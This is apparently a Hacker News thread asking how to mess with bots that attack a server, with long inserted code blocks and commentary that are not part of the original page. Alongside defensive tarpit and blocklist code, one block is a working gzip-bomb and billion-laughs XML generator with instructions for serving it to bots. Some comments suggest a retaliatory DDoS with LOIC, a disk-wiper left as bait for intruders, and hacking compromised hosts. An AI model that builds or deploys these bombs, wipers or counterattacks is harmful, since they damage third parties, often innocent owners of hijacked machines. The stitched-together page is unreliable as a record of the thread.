[HN Gopher] Ask HN: Best Way to Mess with Hackers?
___________________________________________________________________
Ask HN: Best Way to Mess with Hackers?
I am watching my fail2ban logs on my servers and while this tool is
fine and will probably annoy them a little, is there a more fun way
to mess with these people? I can see from the failed attempts that
they are trying to curl the kiss-a-dog cryptojacking software, so they
aren't simply probing my server - they are trying to cause harm.
Preferably legal. Making them lose money would be great too!
Author : AJRF
Score : 23 points
Date : 2023-01-29 16:36 UTC (6 hours ago)
| ROTMetro wrote:
| Post that you are releasing your source code as free while
| releasing it under the GPL license not BSD/MIT. That will make
| them go ballistic :)
| nszceta wrote:
| Low Orbit Ion Cannon (LOIC)
| return_to_monke wrote:
| if you have people wanting SSH, there's this:
|
| https://github.com/skeeto/endlessh
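What an SSH tarpit of the endlessh kind actually does, as an added example for this thread (my own code, not the endlessh project's). RFC 4253 section 4.2 lets a server send arbitrary lines of text before its "SSH-2.0-..." identification string, and a conforming client must keep reading until that string arrives; each such line ends in CRLF, must not begin with "SSH-", and is at most 255 characters including the CRLF. Dripping out an endless supply of such lines keeps a scanner's connection and one of its worker threads busy for almost nothing on our side. The listening port (2222), the 10 second delay and the line alphabet are assumptions of this example.

```python
"""endlessh-style SSH tarpit (asyncio). Example code for this thread, not the
endlessh project's implementation."""
import asyncio
import random
import string

LINE_DELAY = 10.0   # seconds between lines (assumed; endlessh defaults to 10 s too)
MAX_BODY = 253      # 255 characters minus the CRLF
LISTEN_PORT = 2222  # assumed: port 22 is redirected here by a firewall rule

# A first character drawn from this set can never start the reserved "SSH-" prefix.
_FIRST = string.ascii_letters.replace("S", "") + string.digits
_BODY = string.ascii_letters + string.digits + " "


def banner_line() -> bytes:
    """One random pre-identification line that is valid under RFC 4253 4.2."""
    length = random.randint(1, MAX_BODY)
    body = random.choice(_FIRST) + "".join(random.choice(_BODY) for _ in range(length - 1))
    return body.encode("ascii") + b"\r\n"


def is_valid_preamble(line: bytes) -> bool:
    """The constraints a conforming client will keep tolerating indefinitely."""
    return (
        line.endswith(b"\r\n")
        and not line.startswith(b"SSH-")
        and len(line) <= 255
        and all(0x20 <= b < 0x7F for b in line[:-2])
    )


async def tarpit(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
    """Never send the version string; just keep the client reading banner lines."""
    peer = writer.get_extra_info("peername")
    sent = 0
    try:
        while True:
            writer.write(banner_line())
            await writer.drain()           # stalls if the peer stops reading, costing us nothing
            sent += 1
            await asyncio.sleep(LINE_DELAY)
    except OSError:                        # peer reset or closed the connection
        pass
    finally:
        writer.close()
        print(f"{peer} held for {sent * LINE_DELAY:.0f} s ({sent} lines)")


async def serve() -> None:
    server = await asyncio.start_server(tarpit, "0.0.0.0", LISTEN_PORT)
    async with server:
        await server.serve_forever()


if __name__ == "__main__":
    asyncio.run(serve())
```

Move the real sshd to another port first, then redirect the scanners' target port to the tarpit with something like `iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222`. Because each connection is one idle coroutine that wakes every ten seconds, thousands of trapped scanners cost a few megabytes of memory and no CPU to speak of.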
| JZerf wrote:
| Tarpitting in general can be fun. I have an iptables rule set
| up on my mail server that limits incoming SMTP traffic from
| suspected spammers to just three packets per minute (which is
| still fast enough for a legitimate mail server to deliver your
| typical, less than 250 KB email in under an hour in case you
| accidentally ensnare a legitimate sender) and I've seen it
| often tying up spammers for 15+ minutes at a time. Below is a
| sample of a rule I might use in case anyone else is interested:
| iptables --append INPUT --source 1.1.1.1,1.1.1.0/24 --protocol tcp \
|     --dport smtp --match hashlimit \
|     --hashlimit-name HASHES_FOR_PROBABLE_SPAMMER_THROTTLING \
|     --hashlimit-mode srcip --hashlimit-above 3/minute --hashlimit-burst 1 \
|     --jump DROP
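A way to sanity-check a rate-limit rule like the one above before deploying it, as an added example for this thread (my own simplified token-bucket model, not netfilter's xt_hashlimit code). Per source IP the bucket holds up to `burst` tokens and refills at `rate` per minute; a packet that finds no token is dropped. It answers two questions: how much of a scanner's burst gets through, and at least how long a legitimate sender needs to push one message through. The 1460 byte segment size is an assumption, and TCP retransmission backoff is ignored, so real delivery through such a throttle is slower than the lower bound computed here.

```python
"""Token-bucket model of an xt_hashlimit rule (--hashlimit-above R/minute
--hashlimit-burst B, per srcip). Simplified model written for this thread;
it is not how the kernel computes credits internally."""
import math

MSS = 1460  # assumed payload bytes per TCP segment (IPv4 over Ethernet)


class HashLimitBucket:
    def __init__(self, rate_per_minute: float, burst: int) -> None:
        self.rate = rate_per_minute / 60.0   # tokens per second
        self.burst = burst
        self.tokens = float(burst)           # starts full: the first `burst` packets pass
        self.last = 0.0

    def allow(self, now: float) -> bool:
        """True if a packet arriving at `now` (seconds since the first one) passes."""
        self.tokens = min(float(self.burst), self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


def simulate_burst(packets: int, rate_per_minute: float, burst: int,
                   spacing: float = 0.01):
    """A sender emitting `packets` segments `spacing` seconds apart: (passed, dropped)."""
    bucket = HashLimitBucket(rate_per_minute, burst)
    passed = sum(bucket.allow(i * spacing) for i in range(packets))
    return passed, packets - passed


def seconds_to_deliver(message_bytes: int, rate_per_minute: float, burst: int,
                       mss: int = MSS) -> float:
    """Lower bound on the time to get one message through: the first `burst`
    segments pass at once, every later segment waits for one token."""
    segments = math.ceil(message_bytes / mss)
    return max(0, segments - burst) * 60.0 / rate_per_minute


if __name__ == "__main__":
    print("scanner blast of 100 segments:", simulate_burst(100, 3, 1))
    print("patient sender, one segment per 20 s:", simulate_burst(10, 3, 1, spacing=20.0))
    print("250 KB message needs at least %.1f min" % (seconds_to_deliver(250 * 1024, 3, 1) / 60))
```

With the thread's numbers (3/minute, burst 1) a 250 KB message is 176 segments and needs at least 58 minutes even for a sender that retries at exactly the right moments; a real MTA backs off exponentially between retransmissions, so the rule is closer to the edge of "still delivers" than the raw arithmetic suggests. Note also that a sender pacing itself to one segment per 20 seconds is never throttled, which is exactly the behaviour a tarpit is meant to impose on spammers.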
| LinuxBender wrote:
| _fun way to mess with these people?_
|
| To some extent yes, give them a status 200 for anything they send
| at you, especially for your default catch-all domain/IP/virtual-
| host. In NGinx this looks like error_page 404
| 500 501 502 503 504 =200 /some_generic_message.html;
|
| I would personally just disable fail2ban. It just consumes more
| CPU especially if using it with iptables. If using _ip route
| blackhole {ip}_ it's not as bad but still a waste of time in my
| opinion. There are enough known compromised hosts out there to
| add millions of entries to your routing table ahead of time. [1]
|
| Add headers and content to the generic message file that has
| links to URLs like WordPress, wp_login.php, wp-story.php,
| js/file-uploader, nf_tracking.php, about.php, wp-reset.php and
| others. To minimize writes on your disk, set custom logs for your
| default virtual-host/IP/domains to either write into a tmpfs ram
| disk or to /dev/null once you get bored watching them. If writing
| to tmpfs be sure to set up a more frequent log rotation and less
| retention. Be sure to also set the HTTP keepalive time very low
| so they are not wasting your resources. No need to tarpit them,
| most of the code used by these bots will time out after a few
| seconds.
|
| [Edit] I should add, these are not hackers you are messing with.
| They are just parasitical script-kiddies that prey on the weak,
| most often using their batches of WordPress hosts as jump-off
| points and watering hole phishing sites to scam the elderly out
| of their life savings.
|
| _Making them lose money would be great too!_
|
| That's much harder. Most of the IPs you see do not belong to the
| attacker. The attacker is likely using a set of Command and
| Control _C&C_ nodes that control a swath of end-user PCs and
| Wordpress servers infected with malware. Anything you do will
| cost them nothing but it might slow their threads down a little.
| The only way to make them lose money would be to find who is
| controlling the C&C nodes, gather evidence and have law
| enforcement take them down. To do this one would have to break
| the law by hacking into the compromised host and see what C&C
| nodes it is dialing home to, then hack into those hosts and see
| who is connecting to them. They could be using Tor but most
| people are lazy enough to not do this.
|
| [1] - https://github.com/firehol/blocklist-ipsets.git
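One way to do the "add millions of entries to your routing table ahead of time" step from [1], as an added example for this thread (my own code, not the firehol project's). The .netset and .ipset files in that repository are plain text: `#` comment lines carrying the list name, maintainer, source URL and entry counts, followed by one IPv4 address or CIDR per line. The script parses that format, collapses overlapping and adjacent prefixes so the kernel gets the minimum number of entries, and emits either an `ip -batch` script of blackhole routes or an `ipset restore` script. The sample list embedded below is constructed from RFC 5737 documentation ranges, not taken from any real blocklist.

```python
"""Turn a FireHOL blocklist-ipsets file into blackhole routes or an ipset.
Example for this thread; not code from the firehol project."""
import ipaddress
import sys
from typing import Iterable, List

# Constructed sample in the FireHOL file format (documentation ranges only).
SAMPLE_NETSET = """\
# example_list
#
# Maintainer      : example
# List source URL : https://example.invalid/list.txt
#
# entries: 5 unique IPs, 3 subnets
192.0.2.0/24
192.0.2.77
198.51.100.0/25
198.51.100.128/25
203.0.113.9
not-an-address
"""

Net = ipaddress.IPv4Network


def parse_netset(text: str) -> List[Net]:
    """Parse FireHOL list text; lines that are not an address/CIDR are reported and skipped."""
    nets: List[Net] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        entry = raw.split("#", 1)[0].strip()   # drop comments, including trailing ones
        if not entry:
            continue
        try:
            nets.append(ipaddress.IPv4Network(entry, strict=False))
        except ValueError:
            print(f"line {lineno}: skipping {entry!r}", file=sys.stderr)
    return nets


def collapse(nets: Iterable[Net]) -> List[Net]:
    """Drop prefixes contained in others and merge adjacent ones: 192.0.2.77 falls
    inside 192.0.2.0/24, and the two /25s become one /24."""
    return list(ipaddress.collapse_addresses(nets))


def ip_batch(nets: Iterable[Net]) -> List[str]:
    """Lines for `ip -force -batch -`: one blackhole route per collapsed prefix."""
    return [f"route add blackhole {n.with_prefixlen}" for n in collapse(nets)]


def ipset_restore(name: str, nets: Iterable[Net]) -> str:
    """Script for `ipset -exist restore`; match it with
    `iptables -I INPUT -m set --match-set <name> src -j DROP`."""
    lines = [f"create {name} hash:net family inet hashsize 65536 maxelem 4000000"]
    lines += [f"add {name} {n.with_prefixlen}" for n in collapse(nets)]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NETSET
    print("\n".join(ip_batch(parse_netset(text))))
```

Feeding the route list through `ip -batch` (or the set through `ipset restore`) instead of one `ip route add` per entry is what makes a multi-million-entry preload finish in seconds rather than hours; collapsing first also keeps the routing table from carrying a /32 for every host that is already covered by a listed /24.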
| moomoo11 wrote:
| If someone tries to find your .env (obv I'm not dumb enough to
| expose it) have it ddos the originator instead.
| aww_dang wrote:
| Set gzip encoding, respond with gigabytes of gzipped zeroes.
|
| https://en.wikipedia.org/wiki/Zip_bomb
|
| There's more you can do when they actually parse documents. XML +
| XSLT can overflow some systems. Even just a deep html document
| tree can use up resources.
| LinuxBender wrote:
| That's a fun one. Also 32GB favicon.ico's for the default
| catch-all host/IP assuming one is OK with the extra bandwidth
| usage.
| colanderman wrote:
| Straight XML often suffices, no XSLT needed:
| https://en.m.wikipedia.org/wiki/Billion_laughs_attack
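The two amplification payloads discussed in this subthread (aww_dang's gzip bomb and colanderman's billion-laughs XML), built and measured rather than estimated, as an added example for this thread and not any commenter's code. The gzip stream is generated through `zlib.compressobj` so the plaintext never exists in memory, and the XML builder returns both the document and the number of characters a naive parser must materialise; a tiny instance is then parsed with the stdlib's expat-backed parser to confirm the formula. Chunk size, entity names and the "lol" base string are assumptions of the example.

```python
"""gzip bomb and XML entity-expansion bomb, with their amplification factors.
Example code for this thread, not from any commenter."""
import gzip
import zlib
import xml.etree.ElementTree as ET
from typing import Tuple

CHUNK = 1 << 20  # feed the compressor 1 MiB of zeros at a time (assumed chunk size)


def gzip_bomb(logical_bytes: int) -> bytes:
    """A valid gzip stream that inflates to `logical_bytes` zero bytes.

    Streaming through compressobj keeps memory at one chunk however large the
    logical size is; wbits=31 selects the gzip container with a 32 KiB window."""
    comp = zlib.compressobj(9, zlib.DEFLATED, 31)
    zeros = bytes(CHUNK)
    out = []
    remaining = logical_bytes
    while remaining > 0:
        n = min(CHUNK, remaining)
        out.append(comp.compress(zeros[:n]))
        remaining -= n
    out.append(comp.flush())
    return b"".join(out)


def inflated_size(stream: bytes) -> int:
    """What a client that honours Content-Encoding: gzip ends up allocating."""
    return len(gzip.decompress(stream))


def gzip_amplification(logical_bytes: int) -> float:
    """Inflated bytes per byte actually sent on the wire."""
    return logical_bytes / len(gzip_bomb(logical_bytes))


def xml_bomb(levels: int = 9, fanout: int = 10, base: str = "lol") -> Tuple[bytes, int]:
    """Return (document, characters the parser must materialise).

    lol0 = base; lol{i} = `fanout` references to lol{i-1}; the body references
    lol{levels} once, so the text expands to len(base) * fanout**levels
    characters. The defaults give the classic 3 GB from under 1 KB of XML."""
    entities = [f'<!ENTITY lol0 "{base}">']
    for i in range(1, levels + 1):
        refs = f"&lol{i - 1};" * fanout
        entities.append(f'<!ENTITY lol{i} "{refs}">')
    doc = (
        '<?xml version="1.0"?>\n<!DOCTYPE lolz [\n'
        + "\n".join(entities)
        + f"\n]>\n<lolz>&lol{levels};</lolz>\n"
    )
    return doc.encode("ascii"), len(base) * fanout ** levels


def expanded_text_length(doc: bytes) -> int:
    """Parse with the stdlib parser and measure the text it built. This is the
    victim's side of the exchange: only call it on small instances."""
    return len(ET.fromstring(doc).text or "")


if __name__ == "__main__":
    print("gzip: 16 MiB of zeros -> %.0f:1" % gzip_amplification(16 << 20))
    doc, n = xml_bomb()
    print("xml: %d bytes of document -> %d characters (%.0f:1)" % (len(doc), n, n / len(doc)))
    small, m = xml_bomb(levels=3)
    print("parser materialised", expanded_text_length(small), "characters, formula says", m)
```

To serve the gzip bomb, reply with `Content-Encoding: gzip`, a `Content-Length` equal to the compressed size and the bytes from `gzip_bomb(10 << 30)` as the body; the bot's HTTP library inflates it without asking. Deflate tops out at roughly 1000:1 on zeros, so 10 GiB of zeros costs about 10 MiB of bandwidth per hit, which is the "extra bandwidth usage" trade-off LinuxBender mentions. The XML variant is far cheaper to send but only bites when the bot actually parses what it fetched, and modern expat-based parsers cap entity amplification, so it mostly catches older or hand-rolled tooling.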
| cypherg wrote:
| make an ssh honeypot (in docker) that is extremely limited in
| speed/bandwidth. Have only one small binary in the home folder
| called "PASSWORD_STORAGE" that has no execute permissions.
| Hopefully someone will download the binary to their own machine
| and execute it. Instead of a benign file, "PASSWORD_STORAGE" should
| be a disk encryptor/drive wiper.
___________________________________________________________________
(page generated 2023-01-29 23:02 UTC)